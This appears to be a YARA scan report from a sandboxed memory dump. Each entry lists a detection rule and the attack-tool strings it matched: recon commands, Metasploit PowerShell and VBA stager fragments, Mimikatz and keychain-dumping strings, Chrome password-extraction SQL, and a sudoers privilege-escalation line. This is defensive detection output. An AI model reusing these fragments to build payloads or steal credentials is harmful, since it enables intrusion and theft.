00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | Recon_Commands_Windows_Gen1 | Detects a set of reconnaissance commands on Windows systems | Florian Roth | - 0x1a23:$s1: netstat -an
- 0x23a94:$s3: net user
- 0x23aa2:$s3: net user
- 0x1a8c:$s4: whoami
- 0x23abe:$s7: net localgroup administrators
|
00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | Payload_Exe2Hex | Detects payload generated by exe2hex | Florian Roth | - 0x29ab9:$a1: set /p "=4d5a
- 0x29acb:$a2: powershell -Command "$hex=
- 0x29aea:$b1: set+%2Fp+%22%3D4d5
- 0x29b01:$b2: powershell+-Command+%22%24hex
- 0x29b23:$c1: echo 4d 5a
- 0x29b33:$c2: echo r cx >>
- 0x29b44:$d1: echo+4d+5a+
- 0x29b54:$d2: echo+r+cx+%3E%3E
|
00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | Exploit_MS15_077_078 | MS15-078 / MS15-077 exploit - generic signature | Florian Roth | - 0xab2e:$s1: GDI32.DLL
- 0x2212e:$s1: GDI32.DLL
- 0xab4a:$s3: AddFontMemResourceEx
- 0xab63:$s4: NamedEscape
- 0xab73:$s5: CreateBitmap
- 0xab84:$s6: DeleteObject
- 0xab96:$op0: 83 45 E8 01 EB 07 C7 45 E8
- 0xaba5:$op1: 8D 85 24 42 FB FF 89 04 24 E8 80 22 00 00 C7 45
- 0xabbb:$op2: EB 54 8B 15 6C 00 4C 00 8D 85 24 42 FB FF 89 44
- 0xabd1:$op3: 64 00 88 FF 84 03 70 03
|
00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | DeepPanda_htran_exe | Hack Deep Panda - htran-exe | Florian Roth | - 0x22642:$s3: [SERVER]connection to %s:%d error
- 0x22668:$s4: -tran <ConnectPort> <TransmitHost> <TransmitPort>
- 0x22754:$s11: -slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>
- 0x227c3:$s20: -listen <ConnectPort> <TransmitPort>
|
00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | CN_Toolset_NTscan_PipeCmd | Detects a Chinese hacktool from a disclosed toolset - file PipeCmd.exe | Florian Roth | - 0x20fdf:$s2: Please Use NTCmd.exe Run This Program.
- 0x2101d:$s4: \\.\pipe\%s%s%d
- 0x2100a:$s5: %s\pipe\%s%s%d
- 0x21031:$s6: %s\ADMIN$\System32\%s%s
- 0x21031:$s7: %s\ADMIN$\System32\%s
- 0x20fbc:$s9: PipeCmdSrv.exe
- 0x2104d:$s10: This is a service executable! Couldn't start directly.
|
00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | RemCom_RemoteCommandExecution | Detects strings from RemCom tool | Florian Roth | - 0x2101d:$: \\.\pipe\%s%s%d
- 0x21033:$: \ADMIN$\System32\%s%s
|
00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | power_pe_injection | PowerShell with PE Reflective Injection | Benjamin DELPY (gentilkiwi) | - 0x225e:$str_loadlib: 0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9
|
00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | apt_equation_equationlaser_runtimeclasses | Rule to detect the EquationLaser malware | unknown | - 0x192e3:$a1: ?a73957838_2@@YAXXZ
- 0x192fb:$a2: ?a84884@@YAXXZ
- 0x1930e:$a3: ?b823838_9839@@YAXXZ
- 0x19327:$a4: ?e747383_94@@YAXXZ
- 0x1933e:$a5: ?e83834@@YAXXZ
- 0x19351:$a6: ?e929348_827@@YAXXZ
|
00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | apt_equation_cryptotable | Rule to detect the crypto library used in Equation group malware | unknown | - 0x19432:$a: 37 DF E8 B6 C7 9C 0B AE 91 EF F0 3B 90 C6 80 85 5D 19 4B 45 44 12 3C E2 0D 5C 1C 7B C4 FF D6 05 ...
|
00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | EquationDrug_HDDSSD_Op | EquationDrug - HDD/SSD firmware operation - nls_933w.dll | Florian Roth @4nc4p | - 0x1a2b1:$s0: nls_933w.dll
- 0x1ab63:$s0: nls_933w.dll
- 0x1ac2d:$s0: nls_933w.dll
|
00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | webshell_php_obfuscated_encoding | PHP webshell obfuscated by encoding | Arnim Rupp | - 0x14e8:$enc_eval1: \x65\x76\x61\x6C\x28
- 0x14e8:$enc_eval2: \x65\x76\x61\x6C\x28
- 0xbe9:$php_short: <?
- 0x1c84:$php_short: <?
- 0xbe9:$php_new2: <?php
- 0x1c84:$php_new2: <?php
|
00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | webshell_php_by_string_known_webshell | Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are caught by other rules in here but maybe these catch different versions. | Arnim Rupp | - 0xbab:$pbs6: 0de664ecd2be02cdd54234a0d1229b43
- 0xbe9:$php_short: <?
- 0x1c84:$php_short: <?
- 0xbe9:$php_new2: <?php
- 0x1c84:$php_new2: <?php
|
00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | webshell_php_by_string_obfuscation | PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming | Arnim Rupp | - 0xd69:$opbs16: 'ev'.'al'
- 0xd69:$opbs31: 'ev'.'al'
- 0x14e8:$opbs77: \x65\x76\x61\x6C\x28
- 0xbe9:$php_short: <?
- 0x1c84:$php_short: <?
- 0xbe9:$php_new2: <?php
- 0x1c84:$php_new2: <?php
|
00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | FVEY_ShadowBrokers_Jan17_Screen_Strings | Detects strings derived from the ShadowBroker's leak of Windows tools/exploits | Florian Roth | - 0x1bdab:$x1: Danderspritz
- 0x1bdbc:$x2: DanderSpritz
- 0x1bdcd:$x3: PeddleCheap
- 0x1bddd:$x4: ChimneyPool Addres
- 0x1bdf4:$a1: Getting remote time
- 0x1be0c:$a2: RETRIEVED
- 0x1be1a:$b1: Added Ops library to Python search path
- 0x1be46:$b2: target: z0.0.0.1
- 0x1be5b:$c1: Psp_Avoidance
- 0x1be6d:$c2: PasswordDump
- 0x1be8c:$c4: EventLogEdit
- 0x1beaf:$d1: Mcl_NtElevation
- 0x1bec3:$d2: Mcl_NtNativeApi
- 0x1bed7:$d3: Mcl_ThreatInject
- 0x1beec:$d4: Mcl_NtMemory
|
00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | doublepulsarxor_petya | rule to hit on the xored doublepulsar shellcode | patrick jones | - 0x1c202:$doublepulsarxor_petya: FD 0C 8C 5C B8 C4 24 C5 CC CC CC 0E E8 CC 24 6B CC CC CC 0F 24 CD CC CC CC 27 5C 97 75 BA CD CC ...
|
00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | doublepulsardllinjection_petya | rule to hit on the xored doublepulsar dll injection shellcode | patrick jones | - 0x1c456:$doublepulsardllinjection_petya: 45 20 8D 93 8D 92 8D 91 8D 90 92 93 91 97 0F 9F 9E 9D 99 84 45 29 84 4D 20 CC CD CC CC 9B 84 45 ...
|
00000012.00000002.592199194.00000000032EF000.00000004.00000001.sdmp | Meterpreter_Reverse_Tcp | Meterpreter reverse TCP backdoor in memory. Tested on Win7x64. | chort (@chort0) | - 0x1c524:$b: 4D 45 54 45 52 50 52 45 54 45 52 5F 55 41
- 0x1c536:$c: 47 45 54 20 2F 31 32 33 34 35 36 37 38 39 20 48 54 54 50 2F 31 2E 30
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_exploit_cve_5889 | http://www.cvedetails.com/cve/cve-2015-5889 | @mimeframe | - 0x594c3:$a1: /etc/sudoers
- 0x594d4:$a2: /etc/crontab
- 0x594e5:$a3: * * * * * root echo
- 0x594fd:$a4: ALL ALL=(ALL) NOPASSWD: ALL
- 0x5951d:$a5: /usr/bin/rsh
- 0x178d0:$a6: localhost
- 0x24b89:$a6: localhost
- 0x5952e:$a6: localhost
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_exploit_tpwn | tpwn exploits a null pointer dereference in XNU to escalate privileges to root. | @mimeframe | - 0x59609:$a1: [-] Couldn't find a ROP gadget, aborting.
- 0x59637:$a2: leaked kaslr slide,
- 0x5964f:$a3: didn't get root, but this system is vulnerable.
- 0x59683:$a4: Escalating privileges! -qwertyoruiop
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_juuso_keychaindump | For reading OS X keychain passwords as root. | @mimeframe | - 0x59749:$a1: [-] Too many candidate keys to fit in memory
- 0x5977a:$a2: [-] Could not allocate memory for key search
- 0x597ab:$a3: [-] Too many credentials to fit in memory
- 0x597d9:$a4: [-] The target file is not a keychain file
- 0x59808:$a5: [-] Could not find the securityd process
- 0x59835:$a6: [-] No root privileges, please run with sudo
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_keylogger_b4rsby_swiftlog | Dirty user level command line keylogger hacked together in Swift. | @mimeframe | - 0x5991c:$a1: You need to enable the keylogger in the System Prefrences
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_keylogger_caseyscarborough | A simple and easy to use keylogger for macOS. | @mimeframe | - 0x59a08:$a1: /var/log/keystroke.log
- 0x59b45:$a1: /var/log/keystroke.log
- 0x59a23:$a2: ERROR: Unable to create event tap.
- 0x59d9f:$a2: ERROR: Unable to create event tap.
- 0x59a4a:$a3: Keylogging has begun.
- 0x59a64:$a4: ERROR: Unable to open log file. Ensure that you have the proper permissions.
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_keylogger_dannvix | A simple keylogger for macOS. | @mimeframe | - 0x59a08:$a1: /var/log/keystroke.log
- 0x59b45:$a1: /var/log/keystroke.log
- 0x59b60:$a2: <forward-delete>
- 0x59b75:$a3: <unknown>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_keylogger_eldeveloper_keystats | A simple keylogger for macOS. | @mimeframe | - 0x59c1f:$a1: YVBKeyLoggerPerishedNotification
- 0x59c44:$a2: YVBKeyLoggerPerishedByLackOfResponseNotification
- 0x59c79:$a3: YVBKeyLoggerPerishedByUserChangeNotification
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_keylogger_giacomolaw | A simple keylogger for macOS. | @mimeframe | - 0x59d3c:$a1: ERROR: Unable to access keystroke log file. Please make sure you have the correct permissions.
- 0x59a23:$a2: ERROR: Unable to create event tap.
- 0x59d9f:$a2: ERROR: Unable to create event tap.
- 0x59dc6:$a3: Keystrokes are now being recorded
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_keylogger_logkext | LogKext is an open source keylogger for Mac OS X, a product of FSB software. | @mimeframe | - 0x59ea7:$a1: logKextPassKey
- 0x59f80:$a1: logKextPassKey
- 0x59eba:$a2: Couldn't get system keychain:
- 0x59edc:$a3: Error finding secret in keychain
- 0x59f01:$a4: com_fsb_iokit_logKext
- 0x59f1b:$b1: logKext Password:
- 0x59f31:$b2: Logging controls whether the daemon is logging keystrokes (default is on).
- 0x59ea7:$c1: logKextPassKey
- 0x59f80:$c1: logKextPassKey
- 0x59f93:$c2: Error: couldn't create secAccess
- 0x59fb8:$d1: IOHIKeyboard
- 0x59fc9:$d2: Clear keyboards called with kextkeys
- 0x59ff2:$d3: Added notification for keyboard
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_keylogger_roxlu_ofxkeylogger | ofxKeylogger keylogger. | @mimeframe | - 0x5a0a8:$a1: keylogger_init
- 0x5a0bb:$a2: install_keylogger_hook function not found in dll.
- 0x5a0f1:$a3: keylogger_set_callback
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_keylogger_skreweverything_swift | It is a simple and easy to use keylogger for macOS written in Swift. | @mimeframe | - 0x5a1db:$a1: Can't create directories!
- 0x5a1f9:$a2: Can't create manager
- 0x5a212:$a3: Can't open HID!
- 0x5a226:$a4: PRINTSCREEN
- 0x5a236:$a5: LEFTARROW
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_macpmem | MacPmem enables read/write access to physical memory on macOS. Can be used by CSIRT teams and attackers. | @mimeframe | - 0x5a32b:$a1: %s/MacPmem.kext
- 0x5a33f:$a2: The Pmem physical memory imager.
- 0x5a364:$a3: The OSXPmem memory imager.
- 0x5a383:$a4: These AFF4 Volumes will be loaded and their metadata will be parsed before the program runs.
- 0x5a3e4:$a5: Pmem driver version incompatible. Reported
- 0x5a413:$a6: Memory access driver left loaded since you specified the -l flag.
- 0x5a459:$b1: Unloading MacPmem
- 0x5a46f:$b2: MacPmem load tag is
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_manwhoami_icloudcontacts | Pulls iCloud Contacts for an account. No dependencies. No user notification. | @mimeframe | - 0x5a550:$a1: https://setup.icloud.com/setup/authenticate/
- 0x5a581:$a2: https://p04-contacts.icloud.com/
- 0x5a5a6:$a3: HTTP Error 401: Unauthorized. Are you sure the credentials are correct?
- 0x5a5f2:$a4: HTTP Error 404: URL not found. Did you enter a username?
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_manwhoami_mmetokendecrypt | This program decrypts / extracts all authorization tokens on macOS / OS X / OSX. | @mimeframe | - 0x5a6fe:$a1: security find-generic-password -ws 'iCloud'
- 0x5a72e:$a2: ERROR getting iCloud Decryption Key
- 0x5a756:$a3: Could not find MMeTokenFile. You can specify the file manually.
- 0x5a79a:$a4: Decrypting token plist ->
- 0x5a7b8:$a5: Successfully decrypted token plist!
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_manwhoami_osxchromedecrypt | Decrypt Google Chrome / Chromium passwords and credit cards on macOS / OS X. | @mimeframe | - 0x5a8ad:$a1: Credit Cards for Chrome Profile
- 0x5a8d1:$a2: Passwords for Chrome Profile
- 0x5a8f2:$a3: Unknown Card Issuer
- 0x5a90a:$a4: ERROR getting Chrome Safe Storage Key
- 0x5a934:$b1: select name_on_card, card_number_encrypted, expiration_month, expiration_year from credit_cards
- 0x5a998:$b2: select username_value, password_value, origin_url, submit_element from logins
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_n0fate_chainbreaker | chainbreaker can extract user credential in a Keychain file with Master Key or user password in forensically sound manner. | @mimeframe | - 0x5aad7:$a1: [!] Private Key Table is not available
- 0x5ab02:$a2: [!] Public Key Table is not available
- 0x5ab2c:$a3: [-] Decrypted Private Key
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_macos_ptoomey3_keychain_dumper | Keychain dumping utility. | @mimeframe | - 0x5ab5e:$a1: keychain_dumper
- 0x5abe0:$a1: keychain_dumper
- 0x5abf4:$a2: /var/Keychains/keychain-2.db
- 0x5ac15:$a3: <key>keychain-access-groups</key>
- 0x5ac3b:$a4: SELECT DISTINCT agrp FROM genp UNION SELECT DISTINCT agrp FROM inet
- 0x5ac83:$a5: dumpEntitlements
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_multi_bloodhound_owned | Bloodhound: Custom queries to document a compromise, find collateral spread of owned nodes, and visualize deltas in privilege gains | @fusionrace | - 0x5ad95:$s1: Find all owned Domain Admins
- 0x5adb6:$s2: Find Shortest Path from owned node to Domain Admins
- 0x5adee:$s3: List all directly owned nodes
- 0x5ae10:$s4: Set owned and wave properties for a node
- 0x5ae3d:$s5: Find spread of compromise for owned nodes in wave
- 0x5ae73:$s6: Show clusters of password reuse
- 0x5ae97:$s7: Something went wrong when creating SharesPasswordWith relationship
- 0x5aede:$s8: reference doc of custom Cypher queries for BloodHound
- 0x5af18:$s9: Created SharesPasswordWith relationship between
- 0x5af4d:$s10: Skipping finding spread of compromise due to
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_multi_jtesta_ssh_mitm | intercepts ssh connections to capture credentials | @fusionrace | - 0x5b01b:$a1: INTERCEPTED PASSWORD:
- 0x5b035:$a2: more sshbuf problems.
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_multi_masscan | masscan is a performant port scanner, it produces results similar to nmap | @mimeframe | - 0x5b105:$a1: EHLO masscan
- 0x5b116:$a2: User-Agent: masscan/
- 0x5b12f:$a3: /etc/masscan/masscan.conf
- 0x5b14d:$b1: nmap(%s): unsupported. This code will never do DNS lookups.
- 0x5b18d:$b2: nmap(%s): unsupported, we do timing WAY different than nmap
- 0x5b1cd:$b3: [hint] I've got some local priv escalation 0days that might work
- 0x5b212:$b4: [hint] VMware on Macintosh doesn't support masscan
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_multi_ncc_ABPTTS | Allows for TCP tunneling over HTTP | @mimeframe | - 0x5b2d1:$s1: ---===[[[ A Black Path Toward The Sun ]]]===---
- 0x5b305:$s2: https://vulnerableserver/EStatus/
- 0x5b32b:$s3: Error: no ABPTTS forwarding URL was specified. This utility will now exit.
- 0x5b37a:$s4: tQgGur6TFdW9YMbiyuaj9g6yBJb2tCbcgrEq
- 0x5b3a3:$s5: 63688c4f211155c76f2948ba21ebaf83
- 0x5b3c8:$s6: ABPTTSClient-log.txt
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_multi_ntlmrelayx | https://www.fox-it.com/en/insights/blogs/blog/inside-windows-network/ | @mimeframe | - 0x5b4b5:$a1: Started interactive SMB client shell via TCP
- 0x5b4e6:$a2: Service Installed.. CONNECT!
- 0x5b507:$a3: Done dumping SAM hashes for host:
- 0x5b52d:$a4: DA already added. Refusing to add another
- 0x5b55b:$a5: Domain info dumped into lootdir!
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_multi_pyrasite_py | A tool for injecting arbitrary code into running Python processes. | @fusionrace | - 0x5b62b:$s1: WARNING: ptrace is disabled. Injection will not work.
- 0x5b665:$s2: A payload that connects to a given host:port and receives commands
- 0x5b6ac:$s3: A reverse Python connection payload.
- 0x5b6d5:$s4: pyrasite - inject code into a running python process
- 0x5b70e:$s5: The ID of the process to inject code into
- 0x5b73c:$s6: This file is part of pyrasite.
- 0x5b5f0:$s7: https://github.com/lmacken/pyrasite
- 0x5b75f:$s7: https://github.com/lmacken/pyrasite
- 0x5b787:$s8: Setup a communication socket with the process by injecting
- 0x5b7c6:$s9: a reverse subshell and having it connect back to us.
- 0x5b800:$s10: Write out a reverse python connection payload with a custom port
- 0x5b846:$s11: Wait for the injected payload to connect back to us
- 0x5b87f:$s12: PyrasiteIPC
- 0x5b890:$s13: A reverse Python shell that behaves like Python interactive interpreter.
- 0x5b8de:$s14: pyrasite cannot establish reverse
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_multi_responder_py | Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server | @fusionrace | - 0x5ba10:$s1: Poison all requests with another IP address than Responder's one.
- 0x5ba56:$s2: Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned.
- 0x5baaa:$s3: Enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network.
- 0x5bb1c:$s4: This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.
- 0x5bc06:$s4: This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.
- 0x5bb73:$s5: Upstream HTTP proxy used by the rogue WPAD Proxy for outgoing requests (format: host:port)
- 0x5bbd2:$s6: 31mOSX detected, -i mandatory option is missing
- 0x5bb1c:$s7: This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.
- 0x5bc06:$s7: This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_windows_hot_potato | https://foxglovesecurity.com/2016/01/16/hot-potato/ | @mimeframe | - 0x5bcfb:$a1: Parsing initial NTLM auth...
- 0x5bd1c:$a2: Got PROPFIND for /test...
- 0x5bd3a:$a3: Starting NBNS spoofer...
- 0x5bd57:$a4: Exhausting UDP source ports so DNS lookups will fail...
- 0x5bd93:$a5: Usage: potato.exe -ip
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_windows_moyix_creddump | creddump is a python tool to extract credentials and secrets from Windows registry hives. | @mimeframe | - 0x5be71:$a1: !@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%
- 0x5bea4:$a2: 0123456789012345678901234567890123456789
- 0x5bed1:$a3: NTPASSWORD
- 0x5bee0:$a4: LMPASSWORD
- 0x1acdc:$a5: aad3b435b51404eeaad3b435b51404ee
- 0x5beef:$a5: aad3b435b51404eeaad3b435b51404ee
- 0x5bf14:$a6: 31d6cfe0d16ae931b73c59d7e0c089c0
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_windows_ncc_wmicmd | Command shell wrapper for WMI | @mimeframe | - 0x5bfc8:$a1: Need to specify a username, domain and password for non local connections
- 0x5c016:$a2: WS-Management is running on the remote host
- 0x5c046:$a3: firewall (if enabled) allows connections
- 0x5c073:$a4: WARNING: Didn't see stdout output finished marker - output may be truncated
- 0x5c0c3:$a5: Command sleep in milliseconds - increase if getting truncated output
- 0x5c10c:$b1: 0x800706BA
- 0x5c11b:$b2: NTLMDOMAIN:
- 0x5c12b:$b3: cimv2
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_windows_rdp_cmd_delivery | Delivers a text payload via RDP (rubber ducky) | @fusionrace | - 0x5c1f3:$s1: Usage: rdp-cmd-delivery.sh OPTIONS
- 0x5c21a:$s2: [--tofile 'c:\test.txt' local.ps1 #will copy contents of local.ps1 to c:\test.txt
- 0x5c270:$s3: -cmdfile local.bat #will execute everything from local.bat
- 0x5c2be:$s4: To deliver powershell payload, use '--cmdfile script.ps1' but inside powershell console
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_windows_wmi_implant | A PowerShell based tool that is designed to act like a RAT | @fusionrace | - 0x5c3e8:$s1: This really isn't applicable unless you are using WMImplant interactively.
- 0x5c437:$s2: What command do you want to run on the remote system? >
- 0x5c473:$s3: Do you want to [create] or [delete] a string registry value? >
- 0x5c4b6:$s4: Do you want to run a WMImplant against a list of computers from a file? [yes] or [no] >
- 0x5c512:$s5: What is the name of the service you are targeting? >
- 0x5c54b:$s6: This function enables the user to upload or download files to/from the attacking machine to/from the targeted machine
- 0x5c5c5:$s7: gen_cli - Generate the CLI command to execute a command via WMImplant
- 0x5c60f:$s8: exit - Exit WMImplant
- 0x5c629:$s9: Lateral Movement Facilitation
- 0x5c64c:$s10: vacant_system - Determine if a user is away from the system.
- 0x5c68e:$s11: Please provide the ProcessID or ProcessName flag to specify the process to kill!
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_windows_mimikatz_errors | Mimikatz credential dump tool: Error messages | @fusionrace | - 0x5cb36:$s1: [ERROR] [LSA] Symbols
- 0x5cb50:$s2: [ERROR] [CRYPTO] Acquire keys
- 0x5cb72:$s3: [ERROR] [CRYPTO] Symbols
- 0x5cb8f:$s4: [ERROR] [CRYPTO] Init
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | hacktool_windows_mimikatz_sekurlsa | Mimikatz credential dump tool | @fusionrace | - 0x5d056:$s1: dpapisrv!g_MasterKeyCacheList
- 0x5d078:$s2: lsasrv!g_MasterKeyCacheList
- 0x5d098:$s3: !SspCredentialList
- 0x5d0af:$s4: livessp!LiveGlobalLogonSessionList
- 0x5d0d6:$s5: wdigest!l_LogSessList
- 0x5d0f0:$s6: tspkg!TSGlobalCredTable
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Msfpayloads_msf | Metasploit Payloads - file msf.sh | Florian Roth | |
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Msfpayloads_msf_2 | Metasploit Payloads - file msf.asp | Florian Roth | - 0xceb9:$s1: & "\" & "svchost.exe"
- 0xced3:$s2: CreateObject("Wscript.Shell")
- 0xdbaf:$s2: CreateObject("Wscript.Shell")
- 0xe706:$s2: CreateObject("Wscript.Shell")
- 0x14165:$s2: CreateObject("Wscript.Shell")
- 0xcef5:$s3: <% @language="VBScript" %>
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Msfpayloads_msf_psh | Metasploit Payloads - file msf-psh.vba | Florian Roth | - 0xd01a:$s1: powershell.exe -nop -w hidden -e
- 0xe170:$s1: powershell.exe -nop -w hidden -e
- 0x140f2:$s1: powershell.exe -nop -w hidden -e
- 0xd03f:$s2: Call Shell(
- 0xd04f:$s3: Sub Workbook_Open()
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Msfpayloads_msf_exe | Metasploit Payloads - file msf-exe.vba | Florian Roth | - 0xd16d:$s1: '* PAYLOAD DATA
- 0xd181:$s2: = Shell(
- 0xd18f:$s3: = Environ("USERPROFILE")
- 0xd1ac:$s4: '**************************************************************
- 0xd1f0:$s5: ChDir (
- 0xd1fc:$s6: '* MACRO CODE
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Msfpayloads_msf_3 | Metasploit Payloads - file msf.psh | Florian Roth | - 0xd30e:$s1: [DllImport("kernel32.dll")] public static extern int WaitForSingleObject(
- 0xd35c:$s2: public enum MemoryProtection { ExecuteReadWrite = 0x40 }
- 0xd399:$s3: .func]::VirtualAlloc(0,
- 0xd3b5:$s4: .func+AllocationType]::Reserve -bOr [
- 0xd3df:$s5: New-Object System.CodeDom.Compiler.CompilerParameters
- 0xd419:$s6: ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
- 0xd46a:$s7: public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
- 0xd4af:$s8: .func]::CreateThread(0,0,$
- 0xd4ce:$s9: public enum Time : uint { Infinite = 0xFFFFFFFF }
- 0xd505:$s10: = [System.Convert]::FromBase64String("/
- 0xd532:$s11: { $global:result = 3; return }
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Msfpayloads_msf_4 | Metasploit Payloads - file msf.aspx | Florian Roth | - 0xd656:$s1: = VirtualAlloc(IntPtr.Zero,(UIntPtr)
- 0xd67f:$s2: .Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
- 0xd6b0:$s3: [System.Runtime.InteropServices.DllImport("kernel32")]
- 0xd6eb:$s4: private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
- 0xd72a:$s5: private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Msfpayloads_msf_exe_2 | Metasploit Payloads - file msf-exe.aspx | Florian Roth | - 0xd8ab:$x1: = new System.Diagnostics.Process();
- 0xd8d3:$x2: .StartInfo.UseShellExecute = true;
- 0xd8fa:$x3: , "svchost.exe");
- 0xd910:$s4: = Path.GetTempPath();
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Msfpayloads_msf_6 | Metasploit Payloads - file msf.vbs | Florian Roth | - 0xdbad:$s1: = CreateObject("Wscript.Shell")
- 0xe704:$s1: = CreateObject("Wscript.Shell")
- 0x14163:$s1: = CreateObject("Wscript.Shell")
- 0xdbd1:$s2: = CreateObject("Scripting.FileSystemObject")
- 0xe6d3:$s2: = CreateObject("Scripting.FileSystemObject")
- 0xdc02:$s3: .GetSpecialFolder(2)
- 0xdc1b:$s4: .Write Chr(CLng("
- 0xdc31:$s5: = "4d5a90000300000004000000ffff00
- 0xdc57:$s6: For i = 1 to Len(
- 0xdc6d:$s7: ) Step 2
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Msfpayloads_msf_7 | Metasploit Payloads - file msf.vba | Florian Roth | - 0xdd7a:$s1: Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal
- 0xddc2:$s2: = VirtualAlloc(0, UBound(Tsw), &H1000, &H40)
- 0xddf3:$s3: = RtlMoveMemory(
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Msfpayloads_msf_8 | Metasploit Payloads - file msf.ps1 | Florian Roth | - 0xd30e:$s1: [DllImport("kernel32.dll")]
- 0xdf08:$s1: [DllImport("kernel32.dll")]
- 0xdf28:$s2: [DllImport("msvcrt.dll")]
- 0xdf46:$s3: -Name "Win32" -namespace Win32Functions -passthru
- 0xdf7c:$s4: ::VirtualAlloc(0,[Math]::Max($
- 0xdf9f:$s5: .Length,0x1000),0x3000,0x40)
- 0xdfc0:$s6: public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
- 0xe034:$s7: ::memset([IntPtr]($
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Msfpayloads_msf_cmd | Metasploit Payloads - file msf-cmd.ps1 | Florian Roth | - 0xe152:$x1: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e
|
00000012.00000002.594455536.000000000437E000.00000004.00000001.sdmp | Msfpayloads_msf_9 | Metasploit Payloads - file msf.war - contents | Florian Roth | - 0xe268:$s1: if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1)
- 0xe2b6:$s2: .concat(".exe");
- 0xe2cb:$s3: [0] = "chmod";
- 0xe2de:$s4: = Runtime.getRuntime().exec(
- 0x2008a:$s4: = Runtime.getRuntime().exec(
